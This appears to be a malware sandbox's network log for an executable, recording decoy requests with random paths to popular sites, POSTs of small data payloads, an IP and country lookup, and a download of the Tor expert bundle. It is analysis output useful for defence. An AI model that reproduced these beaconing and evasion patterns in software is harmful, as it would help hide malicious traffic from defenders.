          https://www.pornhub.com/YvXAWrkHSP?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /YvXAWrkHSP?q=0 HTTP/1.1
          Host: www.pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 302 Found
          server: openresty
          date: Sat, 14 Oct 2023 18:20:59 GMT
          content-type: text/html; charset=UTF-8
          transfer-encoding: chunked
          cache-control: no-cache, no-store, must-revalidate
          pragma: no-cache
          ph-redirect: 1020
          location: http://154.61.71.51
          x-frame-options: SAMEORIGIN
          vary: User-Agent
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC0B-42FE722901BB9F2DB-A7EF0A3; Secure; Samesite=None
          set-cookie: __l=652ADC0B-42FE722901BB9F2DB-A7EF0A3; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • flag-us
          GET
          https://www.pornhub.com/nZJ8XB6TLb?q=129
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /nZJ8XB6TLb?q=129 HTTP/1.1
          Host: www.pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 302 Found
          server: openresty
          date: Sat, 14 Oct 2023 18:20:59 GMT
          content-type: text/html; charset=UTF-8
          transfer-encoding: chunked
          cache-control: no-cache, no-store, must-revalidate
          pragma: no-cache
          ph-redirect: 1020
          location: http://154.61.71.51
          x-frame-options: SAMEORIGIN
          vary: User-Agent
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC0B-42FE722901BB54E8A-A7BDA17; Secure; Samesite=None
          set-cookie: __l=652ADC0B-42FE722901BB54E8A-A7BDA17; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • flag-us
          DNS
          apps.identrust.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          apps.identrust.com
          IN A
          Response
          apps.identrust.com
          IN CNAME
          identrust.edgesuite.net
          identrust.edgesuite.net
          IN CNAME
          a1952.dscq.akamai.net
          a1952.dscq.akamai.net
          IN A
          88.221.25.169
          a1952.dscq.akamai.net
          IN A
          88.221.25.153
        • flag-nl
          GET
          http://apps.identrust.com/roots/dstrootcax3.p7c
          B9a5797cb584014f3fede.exe
          Remote address:
          88.221.25.169:80
          Request
          GET /roots/dstrootcax3.p7c HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Microsoft-CryptoAPI/6.1
          Host: apps.identrust.com
          Response
          HTTP/1.1 200 OK
          X-XSS-Protection: 1; mode=block
          X-Frame-Options: SAMEORIGIN
          X-Content-Type-Options: nosniff
          X-Robots-Tag: noindex
          Referrer-Policy: same-origin
          Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
          ETag: "37d-6079b8c0929c0"
          Accept-Ranges: bytes
          Content-Length: 893
          X-Content-Type-Options: nosniff
          X-Frame-Options: sameorigin
          Content-Type: application/pkcs7-mime
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:20:59 GMT
          Date: Sat, 14 Oct 2023 18:20:59 GMT
          Connection: keep-alive
        • flag-us
          GET
          http://openai.com/ftOpuXgkwC?q=229
          B9a5797cb584014f3fede.exe
          Remote address:
          13.107.213.67:80
          Request
          GET /ftOpuXgkwC?q=229 HTTP/1.1
          Host: openai.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 307 Temporary Redirect
          Location: https://openai.com/ftOpuXgkwC?q=229
          X-Azure-Ref: 0EdwqZQAAAACal88a+BsaT5FNBcZmeLWKQlJVMzBFREdFMDcxMAA3ZjE3YzA2NC00MTQ5LTQ2ODctOTk4Yy00ZDliMjE2YjI1OGY=
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Content-Length: 0
        • flag-us
          POST
          http://openai.com/ScdEUc6SlP?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          13.107.213.67:80
          Request
          POST /ScdEUc6SlP?q=1 HTTP/1.1
          Host: openai.com
          Content-Length: 121
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 307 Temporary Redirect
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Content-Type: text/html
          Content-Length: 0
          Connection: keep-alive
          Location: https://openai.com/ScdEUc6SlP?q=1
          x-azure-ref: 20231014T182105Z-3hfv7z0vc92e7558p4mdtfw7rg00000004u000000000x5yf
          X-Cache: CONFIG_NOCACHE
        • flag-us
          GET
          http://ip-api.com/line?fields=query,country
          B9a5797cb584014f3fede.exe
          Remote address:
          208.95.112.1:80
          Request
          GET /line?fields=query,country HTTP/1.1
          Host: ip-api.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Sat, 14 Oct 2023 18:21:04 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 25
          Access-Control-Allow-Origin: *
          X-Ttl: 53
          X-Rl: 43
        • flag-us
          GET
          http://pornhub.com/nZJ8XB6TLb?q=129
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:80
          Request
          GET /nZJ8XB6TLb?q=129 HTTP/1.1
          Host: pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          content-length: 0
          location: https://pornhub.com/nZJ8XB6TLb?q=129
        • flag-us
          POST
          http://pornhub.com/NXksi90VVl?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:80
          Request
          POST /NXksi90VVl?q=1 HTTP/1.1
          Host: pornhub.com
          Content-Length: 143
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          content-length: 0
          location: https://pornhub.com/NXksi90VVl?q=1
          connection: close
        • flag-us
          GET
          http://pornhub.com/nZJ8XB6TLb?q=129
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:80
          Request
          GET /nZJ8XB6TLb?q=129 HTTP/1.1
          Host: pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          content-length: 0
          location: https://pornhub.com/nZJ8XB6TLb?q=129
        • flag-nl
          GET
          http://google.com/7jG017oTlL?q=93
          B9a5797cb584014f3fede.exe
          Remote address:
          142.250.179.142:80
          Request
          GET /7jG017oTlL?q=93 HTTP/1.1
          Host: google.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=UTF-8
          Referrer-Policy: no-referrer
          Content-Length: 1571
          Date: Sat, 14 Oct 2023 18:21:05 GMT
        • flag-nl
          GET
          http://google.com/In4oCqfhFE?q=131
          B9a5797cb584014f3fede.exe
          Remote address:
          142.250.179.142:80
          Request
          GET /In4oCqfhFE?q=131 HTTP/1.1
          Host: google.com
          Response
          HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=UTF-8
          Referrer-Policy: no-referrer
          Content-Length: 1571
          Date: Sat, 14 Oct 2023 18:21:07 GMT
        • flag-nl
          POST
          http://youtube.com/Ep3hnbR6IC?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /Ep3hnbR6IC?q=0 HTTP/1.1
          Host: youtube.com
          Content-Length: 162
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/Ep3hnbR6IC?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /Ep3hnbR6IC?q=0 HTTP/1.1
          Host: youtube.com
          Content-Length: 162
          Expect: 100-continue
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:06 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:06 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:06 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:06 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:06 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:06 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:06 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-de
          GET
          https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
          B9a5797cb584014f3fede.exe
          Remote address:
          159.69.63.226:443
          Request
          GET /tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz HTTP/1.1
          Host: archive.torproject.org
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Server: Apache
          X-Content-Type-Options: nosniff
          X-Frame-Options: sameorigin
          X-Xss-Protection: 1
          Referrer-Policy: no-referrer
          Strict-Transport-Security: max-age=15768000; preload
          Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
          Last-Modified: Thu, 16 Mar 2023 15:33:36 GMT
          ETag: "d42801-5f7062f2cbbbf"
          Accept-Ranges: bytes
          Content-Length: 13903873
          Cache-Control: max-age=2592000
          Expires: Mon, 13 Nov 2023 18:21:05 GMT
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/x-gzip
          Content-Language: en
        • flag-us
          GET
          https://pornhub.com/nZJ8XB6TLb?q=129
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /nZJ8XB6TLb?q=129 HTTP/1.1
          Host: pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          server: openresty
          date: Sat, 14 Oct 2023 18:21:05 GMT
          content-type: text/html
          content-length: 166
          location: https://www.pornhub.com/nZJ8XB6TLb?q=129
          x-frame-options: SAMEORIGIN
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC11-42FE722901BB1C2393-A15825E; Secure; Samesite=None
          set-cookie: __l=652ADC11-42FE722901BB1C2393-A15825E; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • flag-us
          GET
          https://pornhub.com/NXksi90VVl?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /NXksi90VVl?q=1 HTTP/1.1
          Host: pornhub.com
          Response
          HTTP/1.1 301 Moved Permanently
          server: openresty
          date: Sat, 14 Oct 2023 18:21:05 GMT
          content-type: text/html
          content-length: 166
          location: https://www.pornhub.com/NXksi90VVl?q=1
          x-frame-options: SAMEORIGIN
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC11-42FE722901BB1C2393-A15827F; Secure; Samesite=None
          set-cookie: __l=652ADC11-42FE722901BB1C2393-A15827F; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • flag-us
          GET
          https://pornhub.com/nZJ8XB6TLb?q=129
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /nZJ8XB6TLb?q=129 HTTP/1.1
          Host: pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          server: openresty
          date: Sat, 14 Oct 2023 18:21:05 GMT
          content-type: text/html
          content-length: 166
          location: https://www.pornhub.com/nZJ8XB6TLb?q=129
          x-frame-options: SAMEORIGIN
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC11-42FE722901BB1C2393-A15828A; Secure; Samesite=None
          set-cookie: __l=652ADC11-42FE722901BB1C2393-A15828A; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • flag-nl
          POST
          http://youtube.com/Ep3hnbR6IC?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /Ep3hnbR6IC?q=0 HTTP/1.1
          Host: youtube.com
          Content-Length: 162
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/Ep3hnbR6IC?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /Ep3hnbR6IC?q=0 HTTP/1.1
          Host: youtube.com
          Content-Length: 162
          Expect: 100-continue
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:06 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/Ep3hnbR6IC?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /Ep3hnbR6IC?q=0 HTTP/1.1
          Host: youtube.com
          Content-Length: 162
          Expect: 100-continue
          Response
          HTTP/1.1 400 Bad Request
          Content-Type: text/html; charset=utf-8
          X-Content-Type-Options: nosniff
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Sat, 14 Oct 2023 18:21:06 GMT
          Server: ESF
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Accept-Ranges: none
          Vary: Accept-Encoding
          Transfer-Encoding: chunked
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
        • flag-nl
          POST
          http://youtube.com/wsVZjAbAO0?q=2
          B9a5797cb584014f3fede.exe
          Remote address:
          216.58.214.14:80
          Request
          POST /wsVZjAbAO0?q=2 HTTP/1.1
          Host: youtube.com
          Content-Length: 0
        • flag-sk
          GET
          http://eset.com/yLjHhBPMcU?q=108
          B9a5797cb584014f3fede.exe
          Remote address:
          91.228.166.47:80
          Request
          GET /yLjHhBPMcU?q=108 HTTP/1.1
          Host: eset.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          Server: nginx
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Content-Type: text/html
          Content-Length: 178
          Connection: close
          Location: https://www.eset.com/yLjHhBPMcU?q=108
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:21:05 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d70dbc280e34-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:21:05 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d70e4ccc0e34-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:21:05 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d70e9d130e34-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:21:05 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d70ead230e34-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:21:05 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d70daa51b902-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:21:05 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d70dda74b902-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:21:05 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d70dfa99b902-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:21:05 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d70e1aabb902-AMS
        • flag-us
          POST
          http://blockchain.com/GjMLkoZqDj?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          104.16.30.98:80
          Request
          POST /GjMLkoZqDj?q=1 HTTP/1.1
          Host: blockchain.com
          Content-Length: 202
          Expect: 100-continue
          Response
          HTTP/1.1 301 Moved Permanently
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=3600
          Expires: Sat, 14 Oct 2023 19:21:05 GMT
          Location: https://www.blockchain.com/GjMLkoZqDj?q=1
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 8161d70e3aceb902-AMS
        • flag-us
          GET
          https://openai.com/ftOpuXgkwC?q=229
          B9a5797cb584014f3fede.exe
          Remote address:
          13.107.213.67:443
          Request
          GET /ftOpuXgkwC?q=229 HTTP/1.1
          Host: openai.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 404 Not Found
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Content-Type: text/html
          Content-Length: 1944
          Connection: keep-alive
          Vary: Accept-Encoding
          Vary: Accept-Encoding
          Vary: Accept-Encoding
          Vary: Accept-Encoding
          Cache-Control: no-cache
          Content-Range: bytes 0-1943/1944
          ETag: "48563893"
          Last-Modified: Fri, 13 Oct 2023 23:39:46 GMT
          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
          Referrer-Policy: same-origin
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
          X-DNS-Prefetch-Control: off
          X-Frame-Options: SAMEORIGIN
          x-azure-ref: 20231014T182105Z-v0mv08869h4kr7usprrmums9a000000001v000000002upud
          X-Cache: TCP_MISS
        • flag-us
          POST
          https://openai.com/ScdEUc6SlP?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          13.107.213.67:443
          Request
          POST /ScdEUc6SlP?q=1 HTTP/1.1
          Host: openai.com
          Content-Length: 121
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 405 Method Not Allowed
          Cache-Control: no-cache
          Allow: GET, HEAD, OPTIONS
          X-Cache: CONFIG_NOCACHE
          X-Azure-Ref: 0EdwqZQAAAACAjunnfT3qR4lsOM4MzVdkQlJVMzBFREdFMDQxOAA3ZjE3YzA2NC00MTQ5LTQ2ODctOTk4Yy00ZDliMjE2YjI1OGY=
          Date: Sat, 14 Oct 2023 18:21:04 GMT
          Content-Length: 0
        • flag-nl
          POST
          http://google.com/xINnIoXK0o?q=0
          B9a5797cb584014f3fede.exe
          Remote address:
          142.250.179.142:80
          Request
          POST /xINnIoXK0o?q=0 HTTP/1.1
          Host: google.com
          Content-Length: 189
          Expect: 100-continue
          Response
          HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=UTF-8
          Referrer-Policy: no-referrer
          Content-Length: 1571
          Date: Sat, 14 Oct 2023 18:21:05 GMT
